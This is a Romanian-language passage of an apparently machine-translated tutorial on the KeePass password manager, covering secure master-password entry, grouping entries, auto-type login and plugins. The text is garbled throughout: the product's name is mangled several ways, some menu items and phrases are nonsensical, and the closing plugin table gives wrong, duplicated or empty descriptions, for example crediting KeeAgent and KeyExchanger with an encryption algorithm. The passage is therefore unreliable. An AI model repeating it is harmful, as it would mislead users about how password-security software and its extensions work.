La troian nu a putut număra parola dvs. pentru WensAss, ar trebui să utilizați modul de program protejat, similar cu UAC în Windows 7. Pentru a face acest lucru, mergeți la Beekass to "Service | Setări |. Securitate ", Deplasați-vă în partea de jos a ferestrei și bifați caseta de lângă" Introduceți parola principală într-un mod securizat ".
4 Completați parolele bazei de date
Completați parolele bazei de date
Beekass poate sorta parolele pe grupuri. În mod implicit, aveți astfel de grupuri ca "OS" sau "Internet" în noua parolă bancă. Pentru a crea o intrare nouă, selectați grupul corespunzător (sau creați unul nou), faceți clic pe zona albă în dreapta cu butonul din dreapta al mouse-ului și apoi - prin "Adăugare înregistrare".
Completați toate câmpurile și faceți clic pe OK. Deoarece nu mai trebuie să vă amintiți parolele pentru a intra în fiecare cont, puteți seta noul, mai complex, care poate fi generat, de exemplu, pe site-ul Web Passwort-Generator.com.
5 Utilizați autorizația automată
Dacă doriți să vă conectați cu Beekass, deschideți grupul în care este stocată parola corespunzătoare. Faceți clic dreapta pe intrarea corespunzătoare la depozitarea parolei Beekass și selectați "Start Autonoming" din listă. După aceasta, programul va transfera datele browserului dvs., iar browserul va deschide o fereastră nouă în care veți introduce contul dvs.
Rețineți că în câmpul "URL", trebuie să introduceți adresa URL pe care o introduceți de obicei în browser pentru autorizare, altfel nu veți funcționa automat introduceți parola prin WenSass.
6 Extindeți capacitățile de păstrare
Extindeți capacitățile de păstrare
Dacă doriți să extindeți funcționalitatea Beekass, mergeți la "Service | Module | Mai multe module ", după care veți fi redirecționat pe site cu extensii utile (recomandările noastre pot fi găsite în tabelul de mai sus). Acum, faceți clic pe Pluginul Nume, descărcați-l și despachetați-l pe unitatea flash.
Rulați Beekass din nou și mergeți la "Service | Module. În partea de jos va apărea o listă de plug-in-uri disponibile (unele dintre ele pot fi configurate).
Cele mai bune extensii pentru răsturnare
Să presupunem sapperul cu parole cu caracteristici suplimentare, cum ar fi funcția de transfer de rezervă sau parolă pentru telefoanele mobile.
Nume |
Descriere |
| DatabaseBackup. | Setează protecția bancară a parolelor în cazul în care unitatea USB va fi furată sau pierdută. |
| Cifru twofish. | |
| Keeagent. | Adaugă un algoritm de codare aproape imposibil de hack; Rețineți că din acest motiv, Beekass va funcționa mai lent. |
| Keyxchanger. | Adaugă un algoritm de codare aproape imposibil de hack; Rețineți că din acest motiv, Beekass va funcționa mai lent. |
| Keeform. | Deschide site-urile dvs. preferate apăsând butonul și face automat datele de înregistrare. |